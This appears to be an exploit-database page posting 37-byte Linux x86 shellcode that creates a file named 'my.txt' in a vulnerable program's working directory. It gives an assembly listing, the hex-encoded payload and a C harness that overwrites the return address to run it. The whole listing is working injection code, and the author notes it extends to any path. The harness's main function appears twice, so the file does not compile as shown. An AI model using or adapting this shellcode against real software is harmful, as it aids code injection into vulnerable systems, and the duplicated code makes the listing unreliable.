Create 'my.txt' Working Directory (37 Bytes)



EKU-ID: 4745 CVE: OSVDB-ID:
Author: Mohammad Reza Ramezani Published: 2015-04-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
#Title: Create 'my.txt' in present working directory of vulnerable software
#Length: 37 bytes
#Date: 3 April 2015
#Author: Mohammad Reza  Ramezani (mr.ramezani.edu [at] gmail com - g+) 
#Tested On: kali-linux-1.0.6-i386
  
  
  
  
Section   .text
global _start
  
_start:
push byte 8
pop eax
jmp short GoToCall
shellcode:
pop ebx
xor edx, edx
mov [ebx + 6], dl
push word 0544o
pop ecx
int 0x80
  
push byte 1
pop eax
xor ebx, ebx
int 0x80
  
  
GoToCall:
call shellcode
db 'my.txtX'
  
  
This shellcode can generalized by using of absolute path instead of 'my.txt'
*/
  
char shellcode[] = "\x6a\x08\x58\xeb\x14\x5b\x31\xd2"
"\x88\x53\x06\x66\x68\x64\x01\x59\xcd\x80\x6a\x01\x58"
"\x31\xdb\xcd\x80\xe8\xe7\xff\xff\xff\x6d\x79\x2e\x74"
"\x78\x74\x58";
  
int main()
{
    int *ret;
    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
}
  
  
int main()
{
    int *ret;
    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
}